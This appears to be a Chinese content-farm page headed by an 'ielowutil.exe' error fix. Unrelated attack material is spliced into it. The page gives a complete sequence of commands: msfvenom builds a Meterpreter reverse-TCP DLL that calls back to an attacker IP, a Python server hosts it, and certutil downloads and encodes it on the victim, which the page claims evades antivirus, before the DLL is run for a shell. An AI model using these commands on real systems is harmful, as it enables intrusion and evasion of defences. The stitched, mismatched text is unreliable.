前沿拓展:
ielowutil.exe
應(yīng)用程序錯(cuò)誤解法:
1.檢查電腦是否存在**,請(qǐng)使用百度衛(wèi)士進(jìn)行木馬查殺。
還是使用 msfvenom 工具為與攻擊機(jī)器的反向TCP連接生成有效負(fù)載。有效負(fù)載的格式在動(dòng)態(tài)鏈接庫(kù)文件 .dll 中設(shè)置。命名為 dll.txt。成功執(zhí)行后,將在 root 目錄中創(chuàng)建文件。現(xiàn)在,要傳輸該文件,我們可以使用 Python One-liner 生成的 HTTP Server。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.51 lport=1234 -f dll > dll.txt
python -m SimpleHTTPServer 80
有效負(fù)載已托管在服務(wù)器上,在靶機(jī)上執(zhí)行有效負(fù)載之前,我們需要在攻擊計(jì)算機(jī)上啟動(dòng)**,以捕獲在有效負(fù)載執(zhí)行后將生成的會(huì)話。
成功啟動(dòng)攻擊者的**之后再進(jìn)入靶機(jī)。打開(kāi) PowerShell 終端。我們需要將有效負(fù)載下載到這臺(tái)機(jī)器上,并且必須謹(jǐn)慎進(jìn)行。執(zhí)行命令:
certutil -urlcache -split -f http://192.168.1.51/dll.txt dll.txt | certutil -encode dll.txt edll.txt
該文件將被下載為文本文件,并被編碼為另一個(gè)文本文件。
現(xiàn)在要執(zhí)行有效載荷以損害受害者,我們必須對(duì)其進(jìn)行解碼。使用 -decode 參數(shù)解碼有效負(fù)載并將其保存為 exploit.dll(殺毒軟件不會(huì)察覺(jué))。第二運(yùn)行此 DLL。
回到攻擊機(jī)器,以查看我們的**生成并捕獲 meterpreter 的實(shí)例。運(yùn)行 sysinfo 以查看目標(biāo)系統(tǒng)的詳細(xì)信息。
成功使用 Certutil 和惡意編碼的可執(zhí)行文件 Getshell。
拓展知識(shí):
原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請(qǐng)注明出處:http://m.xiesong.cn/23772.html